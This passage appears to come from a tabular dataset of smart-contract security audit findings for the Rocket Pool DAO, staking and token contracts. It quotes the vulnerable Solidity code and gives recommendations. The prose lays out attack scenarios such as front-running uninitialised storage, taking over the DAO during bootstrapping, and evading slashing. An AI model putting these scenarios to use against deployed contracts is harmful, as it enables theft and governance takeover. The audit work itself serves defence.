getContractAddress('rocketDAONodeTrustedProposals').call(abi.encodeWithSignature(""proposalInvite(string,string,address)"", \\_id, \\_email, msg.sender));\\n // Was there an error?\\n require(successPropose, getRevertMsg(responsePropose));\\n // Get the to automatically join as a member (by a regular proposal, they would have to manually accept, but this is no ordinary situation)\\n (bool successJoin, bytes memory responseJoin) = getContractAddress(""rocketDAONodeTrustedActions"").call(abi.encodeWithSignature(""actionJoinRequired(address)"", msg.sender));\\n // Was there an error?\\n require(successJoin, getRevertMsg(responseJoin));\\n}\\n```\\n\\nThis opens up a window during the bootstrapping phase where any Ethereum Address might be able to register as a node (RocketNodeManager.registerNode) if node registration is enabled (default=true) rushing into `RocketDAONodeTrusted.memberJoinRequired` adding themselves (up to 3 nodes) as trusted nodes to the DAO. The new DAO members can now take over the DAO by issuing proposals, waiting 2 blocks to vote/execute them (upgrade, change settings while Guardian is changing settings, etc.). The Guardian role can kick the new DAO members, however, they can invite themselves back into the DAO.\\n```\\nsetSettingBool(""node.registration.enabled"", true); \\n```\\n","Disable the DAO recovery mode during bootstrapping. Disable node registration by default and require the guardian to enable it. Ensure that `bootstrapDisable` (in both DAO contracts) performs sanity checks as to whether the DAO bootstrapping finished and permissions can effectively be revoked without putting the DAO at risk or in an irrecoverable state (enough members bootstrapped, vital configurations like registration and other settings are configured, …).",,"```\\n/\\*\\*\\*\\* Recovery \\*\\*\\*\\*\\*\\*\\*\\*\\*\\*\\*\\*\\*\\*\\*/\\n \\n// In an explicable black swan scenario where the DAO loses more than the min membership required (3), this method can be used by a regular node operator to join the DAO\\n// Must have their ID, email, current RPL bond amount available and must be called by their current registered node account\\nfunction memberJoinRequired(string memory \\_id, string memory \\_email) override public onlyLowMemberMode onlyRegisteredNode(msg.sender) onlyLatestContract(""rocketDAONodeTrusted"", address(this)) {\\n // Ok good to go, lets add them\\n (bool successPropose, bytes memory responsePropose) = getContractAddress('rocketDAONodeTrustedProposals').call(abi.encodeWithSignature(""proposalInvite(string,string,address)"", \\_id, \\_email, msg.sender));\\n // Was there an error?\\n require(successPropose, getRevertMsg(responsePropose));\\n // Get the to automatically join as a member (by a regular proposal, they would have to manually accept, but this is no ordinary situation)\\n (bool successJoin, bytes memory responseJoin) = getContractAddress(""rocketDAONodeTrustedActions"").call(abi.encodeWithSignature(""actionJoinRequired(address)"", msg.sender));\\n // Was there an error?\\n require(successJoin, getRevertMsg(responseJoin));\\n}\\n```\\n" +RocketDaoNodeTrustedActions - Incomplete implementation of member challenge process,high,"Any registered (even untrusted) node can challenge a trusted DAO node to respond. The challenge is initiated by calling `actionChallengeMake`. Trusted nodes can challenge for free, other nodes have to provide `members.challenge.cost` as a tribute to the Ethereum gods. The challenged node must call `actionChallengeDecide` before `challengeStartBlock + members.challenge.window` blocks are over (default approx 7 days). However, the Golang codebase does not actively monitor for the `ActionChallengeMade` event, nor does the node - regularly - check if it is being challenged. Means to respond to the challenge (calling `actionChallengeDecide` to stop the challenge) are not implemented.\\nNodes do not seem to monitor `ActionChallengeMade` events so that they could react to challenges\\nNodes do not implement `actionChallengeDecide` and, therefore, cannot successfully stop a challenge\\nFunds/Tribute sent along with the challenge will be locked forever in the `RocketDAONodeTrustedActions` contract. There's no means to recover the funds.\\nIt is questionable whether the incentives are aligned well enough for anyone to challenge stale nodes. The default of `1 eth` compared to the risk of the “malicious” or “stale” node exiting themselves is quite high. The challenger is not incentivized to challenge someone other than for taking over the DAO. If the tribute is too low, this might incentivize users to grief trusted nodes and force them to close a challenge.\\nRequiring that the challenge initiator is a different registered node than the challenge finalized is a weak protection since the system is open to anyone to register as a node (even without depositing any funds.)\\nblock time is subject to fluctuations. With the default of `43204` blocks, the challenge might expire at `5 days` (10 seconds block time), `6.5 days` (13 seconds Ethereum target median block time), `7 days` (14 seconds), or more with historic block times going up to `20 seconds` for shorter periods.\\nA minority of trusted nodes may use this functionality to boot other trusted node members off the DAO issuing challenges once a day until the DAO member number is low enough to allow them to reach quorum for their own proposals or until the member threshold allows them to add new nodes without having to go through the proposal process at all.\\n```\\nsetSettingUint('members.challenge.cooldown', 6172); // How long a member must wait before performing another challenge, approx. 1 day worth of blocks\\nsetSettingUint('members.challenge.window', 43204); // How long a member has to respond to a challenge. 7 days worth of blocks\\nsetSettingUint('members.challenge.cost', 1 ether); // How much it costs a non-member to challenge a members node. It's free for current members to challenge other members.\\n```\\n\\n```\\n// In the event that the majority/all of members go offline permanently and no more proposals could be passed, a current member or a regular node can 'challenge' a DAO members node to respond\\n// If it does not respond in the given window, it can be removed as a member. The one who removes the member after the challenge isn't met, must be another node other than the proposer to provide some oversight\\n// This should only be used in an emergency situation to recover the DAO. Members that need removing when consensus is still viable, should be done via the 'kick' method.\\n```\\n","Implement the challenge-response process before enabling users to challenge other nodes. Implement means to detect misuse of this feature for griefing e.g. when one trusted node member forces another trusted node to defeat challenges over and over again (technical controls, monitoring).",,"```\\nsetSettingUint('members.challenge.cooldown', 6172); // How long a member must wait before performing another challenge, approx. 1 day worth of blocks\\nsetSettingUint('members.challenge.window', 43204); // How long a member has to respond to a challenge. 7 days worth of blocks\\nsetSettingUint('members.challenge.cost', 1 ether); // How much it costs a non-member to challenge a members node. It's free for current members to challenge other members.\\n```\\n" +RocketDAOProtocolSettings/RocketDAONodeTrustedSettings - anyone can set/overwrite settings until contract is declared “deployed” Acknowledged,high,"The `onlyDAOProtocolProposal` modifier guards all state-changing methods in this contract. However, analog to https://github.com/ConsenSys/rocketpool-audit-2021-03/issues/7, the access control is disabled until the variable `settingsNameSpace.deployed` is set. If this contract is not deployed and configured in one transaction, anyone can update the contract while left unprotected on the blockchain.\\nSee issue 6.5 for a similar issue.\\n```\\nmodifier onlyDAOProtocolProposal() {\\n // If this contract has been initialised, only allow access from the proposals contract\\n if(getBool(keccak256(abi.encodePacked(settingNameSpace, ""deployed"")))) require(getContractAddress('rocketDAOProtocolProposals') == msg.sender, ""Only DAO Protocol Proposals contract can update a setting"");\\n \\_;\\n}\\n```\\n\\n```\\nmodifier onlyDAONodeTrustedProposal() {\\n // If this contract has been initialised, only allow access from the proposals contract\\n if(getBool(keccak256(abi.encodePacked(settingNameSpace, ""deployed"")))) require(getContractAddress('rocketDAONodeTrustedProposals') == msg.sender, ""Only DAO Node Trusted Proposals contract can update a setting"");\\n \\_;\\n}\\n```\\n\\nThere are at least 9 more occurrences of this pattern.",Restrict access to the methods to a temporary trusted account (e.g. guardian) until the system bootstrapping phase ends by setting `deployed` to `true.`,,"```\\nmodifier onlyDAOProtocolProposal() {\\n // If this contract has been initialised, only allow access from the proposals contract\\n if(getBool(keccak256(abi.encodePacked(settingNameSpace, ""deployed"")))) require(getContractAddress('rocketDAOProtocolProposals') == msg.sender, ""Only DAO Protocol Proposals contract can update a setting"");\\n \\_;\\n}\\n```\\n" +RocketStorage - anyone can set/update values before the contract is initialized,high,"According to the deployment script, the contract is deployed, and settings are configured in multiple transactions. This also means that for a period of time, the contract is left unprotected on the blockchain. Anyone can delete/set any value in the centralized data store. An attacker might monitor the mempool for new deployments of the `RocketStorage` contract and front-run calls to `contract.storage.initialised` setting arbitrary values in the system.\\n```\\nmodifier onlyLatestRocketNetworkContract() {\\n // The owner and other contracts are only allowed to set the storage upon deployment to register the initial contracts/settings, afterwards their direct access is disabled\\n if (boolStorage[keccak256(abi.encodePacked(""contract.storage.initialised""))] == true) {\\n // Make sure the access is permitted to only contracts in our Dapp\\n require(boolStorage[keccak256(abi.encodePacked(""contract.exists"", msg.sender))], ""Invalid or outdated network contract"");\\n }\\n \\_;\\n}\\n```\\n",Restrict access to the methods to a temporary trusted account (e.g. guardian) until the system bootstrapping phase ends by setting `initialised` to `true.`,,"```\\nmodifier onlyLatestRocketNetworkContract() {\\n // The owner and other contracts are only allowed to set the storage upon deployment to register the initial contracts/settings, afterwards their direct access is disabled\\n if (boolStorage[keccak256(abi.encodePacked(""contract.storage.initialised""))] == true) {\\n // Make sure the access is permitted to only contracts in our Dapp\\n require(boolStorage[keccak256(abi.encodePacked(""contract.exists"", msg.sender))], ""Invalid or outdated network contract"");\\n }\\n \\_;\\n}\\n```\\n" +RocketDAOProposals - Unpredictable behavior due to short vote delay,high,"A proposal can be voted and passed when it enters the `ACTIVE` state. Voting starts when the current `block.number` is greater than the `startBlock` configured in the proposal (up until the endBlock). The requirement for the `startBlock` is to be at least greater than `block.number` when the proposal is submitted.\\n```\\nrequire(\\_startBlock > block.number, ""Proposal start block must be in the future"");\\nrequire(\\_durationBlocks > 0, ""Proposal cannot have a duration of 0 blocks"");\\nrequire(\\_expiresBlocks > 0, ""Proposal cannot have a execution expiration of 0 blocks"");\\nrequire(\\_votesRequired > 0, ""Proposal cannot have a 0 votes required to be successful"");\\n```\\n\\nThe default vote delay configured in the system is `1` block.\\n```\\nsetSettingUint('proposal.vote.delay.blocks', 1); // How long before a proposal can be voted on after it is created. Approx. Next Block\\n```\\n\\nA vote is immediately passed when the required quorum is reached which allows it to be executed. This means that a group that is holding enough voting power can propose a change, wait for two blocks (block.number (of time of proposal creation) + configuredDelay (1) + 1 (for ACTIVE state), then vote and execute for the proposal to pass for it to take effect almost immediately after only 2 blocks (<30seconds).\\nSettings can be changed after 30 seconds which might be unpredictable for other DAO members and not give them enough time to oppose and leave the DAO.","The underlying issue is that users of the system can't be sure what the behavior of a function call will be, and this is because the behavior can change after two blocks. The only guarantee is that users can be sure the settings don't change for the next block if no proposal is active.\\nWe recommend giving the user advance notice of changes with a delay. For example, all upgrades should require two steps with a mandatory time window between them. The first step merely broadcasts to users that a particular change is coming, and the second step commits that change after a suitable waiting period.",,"```\\nrequire(\\_startBlock > block.number, ""Proposal start block must be in the future"");\\nrequire(\\_durationBlocks > 0, ""Proposal cannot have a duration of 0 blocks"");\\nrequire(\\_expiresBlocks > 0, ""Proposal cannot have a execution expiration of 0 blocks"");\\nrequire(\\_votesRequired > 0, ""Proposal cannot have a 0 votes required to be successful"");\\n```\\n" +RocketNodeStaking - Node operators can reduce slashing impact by withdrawing excess staked RPL,high,"Oracle nodes update the Minipools' balance and progress it to the withdrawable state when they observe the minipools stake to become withdrawable. If the observed stakingEndBalance is less than the user deposit for that pool, the node operator is punished for the difference.\\n```\\nrocketMinipoolManager.setMinipoolWithdrawalBalances(\\_minipoolAddress, \\_stakingEndBalance, nodeAmount);\\n// Apply node penalties by liquidating RPL stake\\nif (\\_stakingEndBalance < userDepositBalance) {\\n RocketNodeStakingInterface rocketNodeStaking = RocketNodeStakingInterface(getContractAddress(""rocketNodeStaking""));\\n rocketNodeStaking.slashRPL(minipool.getNodeAddress(), userDepositBalance - \\_stakingEndBalance);\\n}\\n```\\n\\nThe amount slashed is at max `userDepositBalance - stakingEndBalance`. The `userDepositBalance` is at least `16 ETH` (minipool.half/.full) and at max `32 ETH` (minipool.empty). The maximum amount to be slashed is therefore `32 ETH` (endBalance = 0, minipool.empty).\\nThe slashing amount is denoted in `ETH`. The `RPL` price (in ETH) is updated regularly by oracle nodes (see related issue https://github.com/ConsenSys/rocketpool-audit-2021-03/issues/32; note that the `RPL` token is potentially affected by a similar issue as one can stake `RPL`, wait for the cooldown period & wait for the price to change, and withdraw stake at higher `RPL` price/ETH). The `ETH` amount to be slashed is converted to `RPL`, and the corresponding `RPL` stake is slashed.\\n```\\nuint256 rplSlashAmount = calcBase.mul(\\_ethSlashAmount).div(rocketNetworkPrices.getRPLPrice());\\n// Cap slashed amount to node's RPL stake\\nuint256 rplStake = getNodeRPLStake(\\_nodeAddress);\\nif (rplSlashAmount > rplStake) { rplSlashAmount = rplStake; }\\n// Transfer slashed amount to auction contract\\nrocketVault.transferToken(""rocketAuctionManager"", getContractAddress(""rocketTokenRPL""), rplSlashAmount);\\n// Update RPL stake amounts\\ndecreaseTotalRPLStake(rplSlashAmount);\\ndecreaseNodeRPLStake(\\_nodeAddress, rplSlashAmount);\\n```\\n\\nIf the node does not have a sufficient `RPL` stake to cover the losses, the slashing amount is capped at whatever amount of `RPL` the node has left staked.\\nThe minimum amount of `RPL` a node needs to have staked if it operates minipools is calculated as follows:\\n```\\n // Calculate minimum RPL stake\\n return rocketDAOProtocolSettingsMinipool.getHalfDepositUserAmount()\\n .mul(rocketDAOProtocolSettingsNode.getMinimumPerMinipoolStake())\\n .mul(rocketMinipoolManager.getNodeMinipoolCount(\\_nodeAddress))\\n .div(rocketNetworkPrices.getRPLPrice());\\n}\\n```\\n\\nWith the current configuration, this would resolve in a minimum stake of `16 ETH * 0.1 (10% collateralization) * 1 (nr_minipools) * RPL_Price` for a node operating 1 minipool. This means a node operator basically only needs to have 10% of `16 ETH` staked to operate one minipool.\\nAn operator can withdraw their stake at any time, but they have to wait at least 14 days after the last time they staked (cooldown period). They can, at max, withdraw all but the minimum stake required to run the pools (nr_of_minipools * 16 ETH * 10%). This also means that after the cooldown period, they can reduce their stake to 10% of the half deposit amount (16ETH), then perform a voluntary exit on ETH2 so that the minipool becomes `withdrawable`. If they end up with less than the `userDepositBalance` in staking rewards, they would only get slashed the `1.6 ETH` at max (10% of 16ETH half deposit amount for 1 minipool) even though they incurred a loss that may be up to 32 ETH (empty Minipool empty amount).\\nFurthermore, if a node operator runs multiple minipools, let's say 5, then they would have to provide at least `5*16ETH*0.1 = 8ETH` as a security guarantee in the form of staked RPL. If the node operator incurs a loss with one of their minipools, their 8 ETH RPL stake will likely be slashed in full. Their other - still operating - minipools are not backed by any RPL anymore, and they effectively cannot be slashed anymore. This means that a malicious node operator can create multiple minipools, stake the minimum amount of RPL, get slashed for one minipool, and still operate the others without having the minimum RPL needed to run the minipools staked (getNodeMinipoolLimit).\\nThe RPL stake is donated to the RocketAuctionManager, where they can attempt to buy back RPL potentially at a discount.\\nNote: Staking more RPL (e.g., to add another Minipool) resets the cooldown period for the total RPL staked (not only for the newly added)","It is recommended to redesign the withdrawal process to prevent users from withdrawing their stake while slashable actions can still occur. A potential solution may be to add a locking period in the process. A node operator may schedule the withdrawal of funds, and after a certain time has passed, may withdraw them. This prevents the immediate withdrawal of funds that may need to be reduced while slashable events can still occur. E.g.:\\nA node operator requests to withdraw all but the minimum required stake to run their pools.\\nThe funds are scheduled for withdrawal and locked until a period of X days has passed.\\n(optional) In this period, a slashable event occurs. The funds for compensation are taken from the user's stake including the funds scheduled for withdrawal.\\nAfter the time has passed, the node operator may call a function to trigger the withdrawal and get paid out.",,"```\\nrocketMinipoolManager.setMinipoolWithdrawalBalances(\\_minipoolAddress, \\_stakingEndBalance, nodeAmount);\\n// Apply node penalties by liquidating RPL stake\\nif (\\_stakingEndBalance < userDepositBalance) {\\n RocketNodeStakingInterface rocketNodeStaking = RocketNodeStakingInterface(getContractAddress(""rocketNodeStaking""));\\n rocketNodeStaking.slashRPL(minipool.getNodeAddress(), userDepositBalance - \\_stakingEndBalance);\\n}\\n```\\n" +RocketTokenRPL - inaccurate inflation rate and potential for manipulation lowering the real APY,high,"RocketTokenRPL allows users to swap their fixed-rate tokens to the inflationary RocketTokenRPL ERC20 token via a `swapToken` function. The DAO defines the inflation rate of this token and is initially set to be 5% APY. This APY is configured as a daily inflation rate (APD) with the corresponding `1 day in blocks` inflation interval in the `rocketDAOProtocolSettingsInflation` contract. The DAO members control the inflation settings.\\nAnyone can call `inflationMintTokens` to inflate the token, which mints tokens to the contracts RocketVault. Tokens are minted for discreet intervals since the last time `inflationMintTokens` was called (recorded as inflationCalcBlock). The inflation is then calculated for the passed intervals without taking the current not yet completed interval. However, the `inflationCalcBlock` is set to the current `block.number`, effectively skipping some “time”/blocks of the APY calculation.\\nThe more often `inflationMintTokens` is called, the higher the APY likelihood dropping below the configured 5%. In the worst case, one could manipulate the APY down to 2.45% (assuming that the APD for a 5% APY was configured) by calling `inflationMintTokens` close to the end of every second interval. This would essentially restart the APY interval at `block.number`, skipping blocks of the current interval that have not been accounted for.\\nThe following diagram illustrates the skipped blocks due to the incorrect recording of `inflationCalcBlock` as `block.number`. The example assumes that we are in interval 4 but have not completed it. `3` APD intervals have passed, and this is what the inflation rate is based on. However, the `inflationCalcBlock` is updated to the current `block.number`, skipping some time/blocks that are now unaccounted in the APY restarting the 4th interval at `block.number`.\\n\\nNote: updating the inflation rate will directly affect past inflation intervals that have not been minted! this might be undesirable, and it could be considered to force an inflation mint if the APY changes\\nNote: if the interval is small enough and there is a history of unaccounted intervals to be minted, and the Ethereum network is congested, gas fees may be high and block limits hit, the calculations in the for loop might be susceptible to DoS the inflation mechanism because of gas constraints.\\nNote: The inflation seems only to be triggered regularly on `RocketRewardsPool.claim` (or at any point by external actors). If the price establishes based on the total supply of tokens, then this may give attackers an opportunity to front-run other users trading large amounts of RPL that may previously have calculated their prices based on the un-inflated supply.\\nNote: that the discrete interval-based inflation (e.g., once a day) might create dynamics that put pressure on users to trade their RPL in windows instead of consecutively\\nthe inflation intervals passed is the number of completed intervals. The current interval that is started is not included.\\n```\\nfunction getInlfationIntervalsPassed() override public view returns(uint256) {\\n // The block that inflation was last calculated at\\n uint256 inflationLastCalculatedBlock = getInflationCalcBlock();\\n // Get the daily inflation in blocks\\n uint256 inflationInterval = getInflationIntervalBlocks();\\n // Calculate now if inflation has begun\\n if(inflationLastCalculatedBlock > 0) {\\n return (block.number).sub(inflationLastCalculatedBlock).div(inflationInterval);\\n }else{\\n return 0;\\n }\\n}\\n```\\n\\nthe inflation calculation calculates the to-be-minted tokens for the inflation rate at `newTokens = supply * rateAPD^intervals - supply`\\n```\\nfunction inflationCalculate() override public view returns (uint256) {\\n // The inflation amount\\n uint256 inflationTokenAmount = 0;\\n // Optimisation\\n uint256 inflationRate = getInflationIntervalRate();\\n // Compute the number of inflation intervals elapsed since the last time we minted infation tokens\\n uint256 intervalsSinceLastMint = getInlfationIntervalsPassed();\\n // Only update if last interval has passed and inflation rate is > 0\\n if(intervalsSinceLastMint > 0 && inflationRate > 0) {\\n // Our inflation rate\\n uint256 rate = inflationRate;\\n // Compute inflation for total inflation intervals elapsed\\n for (uint256 i = 1; i < intervalsSinceLastMint; i++) {\\n rate = rate.mul(inflationRate).div(10 \\*\\* 18);\\n }\\n // Get the total supply now\\n uint256 totalSupplyCurrent = totalSupply();\\n // Return inflation amount\\n inflationTokenAmount = totalSupplyCurrent.mul(rate).div(10 \\*\\* 18).sub(totalSupplyCurrent);\\n }\\n // Done\\n return inflationTokenAmount;\\n}\\n```\\n","Properly track `inflationCalcBlock` as the end of the previous interval, as this is up to where the inflation was calculated, instead of the block at which the method was invoked.\\nEnsure APY/APD and interval configuration match up. Ensure the interval is not too small (potential gas DoS blocking inflation mint and RocketRewardsPool.claim).",,```\\nfunction getInlfationIntervalsPassed() override public view returns(uint256) {\\n // The block that inflation was last calculated at\\n uint256 inflationLastCalculatedBlock = getInflationCalcBlock();\\n // Get the daily inflation in blocks\\n uint256 inflationInterval = getInflationIntervalBlocks();\\n // Calculate now if inflation has begun\\n if(inflationLastCalculatedBlock > 0) {\\n return (block.number).sub(inflationLastCalculatedBlock).div(inflationInterval);\\n }else{\\n return 0;\\n }\\n}\\n```\\n +RocketDAONodeTrustedUpgrade - upgrade does not prevent the use of the same address multiple times creating an inconsistency where getContractAddress returns outdated information,high,"When adding a new contract, it is checked whether the address is already in use. This check is missing when upgrading a named contract to a new implementation, potentially allowing someone to register one address to multiple names creating an inconsistent configuration.\\nThe crux of this is, that, `getContractAddress()` will now return a contract address that is not registered anymore (while `getContractName` may throw). `getContractAddress` can therefore not relied upon when checking ACL.\\nadd contract `name=test, address=0xfefe` ->\\n```\\n sets contract.exists.0xfefe=true\\n sets contract.name.0xfefe=test\\n sets contract.address.test=0xfefe\\n sets contract.abi.test=abi\\n```\\n\\nadd another contract `name=badcontract, address=0xbadbad` ->\\n```\\nsets contract.exists.0xbadbad=true\\nsets contract.name.0xbadbad=badcontract\\nsets contract.address.badcontract=0xbadbad\\nsets contract.abi.badcontract=abi\\n```\\n\\nupdate contract `name=test, address=0xbadbad` reusing badcontradcts address, the address is now bound to 2 names (test, badcontract)\\n```\\noverwrites contract.exists.0xbadbad=true` (even though its already true)\\nupdates contract.name.0xbadbad=test (overwrites the reference to badcontract; badcontracts config is now inconsistent)\\nupdates contract.address.test=0xbadbad (ok, expected)\\nupdates contract.abi.test=abi (ok, expected)\\nremoves contract.name.0xfefe (ok)\\nremoves contract.exists.0xfefe (ok)\\n```\\n\\nupdate contract `name=test, address=0xc0c0`\\n```\\nsets contract.exists.0xc0c0=true\\nsets contract.name.0xc0c0=test (ok, expected)\\nupdates contract.address.test=0xc0c0 (ok, expected)\\nupdates contract.abi.test=abi (ok, expected)\\nremoves contract.name.0xbadbad (the contract is still registered as badcontract, but is indirectly removed now)\\nremoves contract.exists.0xbadbad (the contract is still registered as badcontract, but is indirectly removed now)\\n```\\n\\nAfter this, `badcontract` is partially cleared, `getContractName(0xbadbad)` throws while `getContractAddress(badcontract)` returns `0xbadbad` which is already unregistered (contract.exists.0xbadbad=false)\\n```\\n(removed) contract.exists.0xbadbad\\n(removed) contract.name.0xbadbad=badcontract\\nsets contract.address.badcontract=0xbadbad\\nsets contract.abi.badcontract=abi\\n```\\n\\ncheck in `_addContract``\\n```\\nrequire(\\_contractAddress != address(0x0), ""Invalid contract address"");\\n```\\n\\nno checks in `upgrade.`\\n```\\nrequire(\\_contractAddress != address(0x0), ""Invalid contract address"");\\nrequire(\\_contractAddress != oldContractAddress, ""The contract address cannot be set to its current address"");\\n// Register new contract\\nsetBool(keccak256(abi.encodePacked(""contract.exists"", \\_contractAddress)), true);\\nsetString(keccak256(abi.encodePacked(""contract.name"", \\_contractAddress)), \\_name);\\nsetAddress(keccak256(abi.encodePacked(""contract.address"", \\_name)), \\_contractAddress);\\nsetString(keccak256(abi.encodePacked(""contract.abi"", \\_name)), \\_contractAbi);\\n```\\n",Resolution\\nA check has been introduced to make sure that the new contract address is not already in use by checking against the corresponding `contract.exists` storage key.\\nCheck that the address being upgraded to is not yet registered and properly clean up `contract.address.`.,,```\\n sets contract.exists.0xfefe=true\\n sets contract.name.0xfefe=test\\n sets contract.address.test=0xfefe\\n sets contract.abi.test=abi\\n```\\n +RocketStorage - Risk concentration by giving all registered contracts permissions to change any settings in RocketStorage Acknowledged,high,"The ACL for changing settings in the centralized `RocketStorage` allows any registered contract (listed under contract.exists) to change settings that belong to other parts of the system.\\nThe concern is that if someone finds a way to add their malicious contract to the registered contact list, they will override any setting in the system. The storage is authoritative when checking certain ACLs. Being able to set any value might allow an attacker to gain control of the complete system. Allowing any contract to overwrite other contracts' settings dramatically increases the attack surface.\\n```\\nmodifier onlyLatestRocketNetworkContract() {\\n // The owner and other contracts are only allowed to set the storage upon deployment to register the initial contracts/settings, afterwards their direct access is disabled\\n if (boolStorage[keccak256(abi.encodePacked(""contract.storage.initialised""))] == true) {\\n // Make sure the access is permitted to only contracts in our Dapp\\n require(boolStorage[keccak256(abi.encodePacked(""contract.exists"", msg.sender))], ""Invalid or outdated network contract"");\\n }\\n \\_;\\n}\\n```\\n\\n```\\nfunction setAddress(bytes32 \\_key, address \\_value) onlyLatestRocketNetworkContract override external {\\n addressStorage[\\_key] = \\_value;\\n}\\n\\n/// @param \\_key The key for the record\\nfunction setUint(bytes32 \\_key, uint \\_value) onlyLatestRocketNetworkContract override external {\\n uIntStorage[\\_key] = \\_value;\\n}\\n```\\n","Resolution\\nThe client provided the following statement:\\nWe've looked at adding access control contracts using namespaces, but the increase in gas usage would be significant and could hinder upgrades.\\nAllow contracts to only change settings related to their namespace.",,"```\\nmodifier onlyLatestRocketNetworkContract() {\\n // The owner and other contracts are only allowed to set the storage upon deployment to register the initial contracts/settings, afterwards their direct access is disabled\\n if (boolStorage[keccak256(abi.encodePacked(""contract.storage.initialised""))] == true) {\\n // Make sure the access is permitted to only contracts in our Dapp\\n require(boolStorage[keccak256(abi.encodePacked(""contract.exists"", msg.sender))], ""Invalid or outdated network contract"");\\n }\\n \\_;\\n}\\n```\\n" +RocketDAOProposals - require a minimum participation quorum for DAO proposals,medium,"If the DAO falls below the minimum viable membership threshold, voting for proposals still continues as DAO proposals do not require a minimum participation quorum. In the worst case, this would allow the last standing DAO member to create a proposal that would be passable with only one vote even if new members would be immediately ready to join via the recovery mode (which has its own risks) as the minimum votes requirement for proposals is set as `>0`.\\n```\\nrequire(\\_votesRequired > 0, ""Proposal cannot have a 0 votes required to be successful"");\\n```\\n\\n```\\nfunction propose(string memory \\_proposalMessage, bytes memory \\_payload) override public onlyTrustedNode(msg.sender) onlyLatestContract(""rocketDAONodeTrustedProposals"", address(this)) returns (uint256) {\\n // Load contracts\\n RocketDAOProposalInterface daoProposal = RocketDAOProposalInterface(getContractAddress('rocketDAOProposal'));\\n RocketDAONodeTrustedInterface daoNodeTrusted = RocketDAONodeTrustedInterface(getContractAddress('rocketDAONodeTrusted'));\\n RocketDAONodeTrustedSettingsProposalsInterface rocketDAONodeTrustedSettingsProposals = RocketDAONodeTrustedSettingsProposalsInterface(getContractAddress(""rocketDAONodeTrustedSettingsProposals""));\\n // Check this user can make a proposal now\\n require(daoNodeTrusted.getMemberLastProposalBlock(msg.sender).add(rocketDAONodeTrustedSettingsProposals.getCooldown()) <= block.number, ""Member has not waited long enough to make another proposal"");\\n // Record the last time this user made a proposal\\n setUint(keccak256(abi.encodePacked(daoNameSpace, ""member.proposal.lastblock"", msg.sender)), block.number);\\n // Create the proposal\\n return daoProposal.add(msg.sender, 'rocketDAONodeTrustedProposals', \\_proposalMessage, block.number.add(rocketDAONodeTrustedSettingsProposals.getVoteDelayBlocks()), rocketDAONodeTrustedSettingsProposals.getVoteBlocks(), rocketDAONodeTrustedSettingsProposals.getExecuteBlocks(), daoNodeTrusted.getMemberQuorumVotesRequired(), \\_payload);\\n}\\n```\\n\\nSidenote: Since a proposals acceptance quorum is recorded on proposal creation, this may lead to another scenario where proposals acceptance quorum may never be reached if members leave the DAO. This would require a re-submission of the proposal.",Do not accept proposals if the member count falls below the minimum DAO membercount threshold.,,"```\\nrequire(\\_votesRequired > 0, ""Proposal cannot have a 0 votes required to be successful"");\\n```\\n" +RocketDAONodeTrustedUpgrade - inconsistent upgrade blacklist,medium,"`upgradeContract` defines a hardcoded list of contracts that cannot be upgraded because they manage their own settings (statevars) or they hold value in the system.\\nthe list is hardcoded and cannot be extended when new contracts are added via `addcontract`. E.g. what if another contract holding value is added to the system? This would require an upgrade of the upgrade contract to update the whitelist (gas hungry, significant risk of losing access to the upgrade mechanisms if a bug is being introduced).\\na contract named `rocketPoolToken` is blacklisted from being upgradeable but the system registers no contract called `rocketPoolToken`. This may be an oversight or artifact of a previous iteration of the code. However, it may allow a malicious group of nodes to add a contract that is not yet in the system which cannot be removed anymore as there is no `removeContract` functionality and `upgradeContract` to override the malicious contract will fail due to the blacklist.\\nNote that upgrading `RocketTokenRPL` requires an account balance migration as contracts in the system may hold value in `RPL` (e.g. a lot in AuctionManager) that may vanish after an upgrade. The contract is not exempt from upgrading. A migration may not be easy to perform as the system cannot be paused to e.g. snapshot balances.\\n```\\nfunction \\_upgradeContract(string memory \\_name, address \\_contractAddress, string memory \\_contractAbi) internal {\\n // Check contract being upgraded\\n bytes32 nameHash = keccak256(abi.encodePacked(\\_name));\\n require(nameHash != keccak256(abi.encodePacked(""rocketVault"")), ""Cannot upgrade the vault"");\\n require(nameHash != keccak256(abi.encodePacked(""rocketPoolToken"")), ""Cannot upgrade token contracts"");\\n require(nameHash != keccak256(abi.encodePacked(""rocketTokenRETH"")), ""Cannot upgrade token contracts"");\\n require(nameHash != keccak256(abi.encodePacked(""rocketTokenNETH"")), ""Cannot upgrade token contracts"");\\n require(nameHash != keccak256(abi.encodePacked(""casperDeposit"")), ""Cannot upgrade the casper deposit contract"");\\n // Get old contract address & check contract exists\\n```\\n",Consider implementing a whitelist of contracts that are allowed to be upgraded instead of a more error-prone blacklist of contracts that cannot be upgraded.\\nProvide documentation that outlines what contracts are upgradeable and why.\\nCreate a process to verify the blacklist before deploying/operating the system.\\nPlan for migration paths when upgrading contracts in the system\\nAny proposal that reaches the upgrade contract must be scrutinized for potential malicious activity (e.g. as any registered contract can directly modify storage or may contain subtle backdoors. Upgrading without performing a thorough security inspection may easily put the DAO at risk),,"```\\nfunction \\_upgradeContract(string memory \\_name, address \\_contractAddress, string memory \\_contractAbi) internal {\\n // Check contract being upgraded\\n bytes32 nameHash = keccak256(abi.encodePacked(\\_name));\\n require(nameHash != keccak256(abi.encodePacked(""rocketVault"")), ""Cannot upgrade the vault"");\\n require(nameHash != keccak256(abi.encodePacked(""rocketPoolToken"")), ""Cannot upgrade token contracts"");\\n require(nameHash != keccak256(abi.encodePacked(""rocketTokenRETH"")), ""Cannot upgrade token contracts"");\\n require(nameHash != keccak256(abi.encodePacked(""rocketTokenNETH"")), ""Cannot upgrade token contracts"");\\n require(nameHash != keccak256(abi.encodePacked(""casperDeposit"")), ""Cannot upgrade the casper deposit contract"");\\n // Get old contract address & check contract exists\\n```\\n" +RocketMinipoolStatus - DAO Membership changes can result in votes getting stuck,medium,"Changes in the DAO's trusted node members are reflected in the `RocketDAONodeTrusted.getMemberCount()` function. When compared with the vote on consensus threshold, a DAO-driven decision is made, e.g., when updating token price feeds and changing Minipool states.\\nEspecially in the early phase of the DAO, the functions below can get stuck as execution is restricted to DAO members who have not voted yet. Consider the following scenario:\\nThe DAO consists of five members\\nTwo members vote to make a Minipool withdrawable\\nThe other three members are inactive, the community votes, and they get kicked from the DAO\\nThe two remaining members have no way to change the Minipool state now. All method calls to trigger the state update fails because the members have already voted before.\\nNote: votes of members that are kicked/leave are still count towards the quorum!\\nSetting a Minipool into the withdrawable state:\\n```\\nRocketDAONodeTrustedInterface rocketDAONodeTrusted = RocketDAONodeTrustedInterface(getContractAddress(""rocketDAONodeTrusted""));\\nif 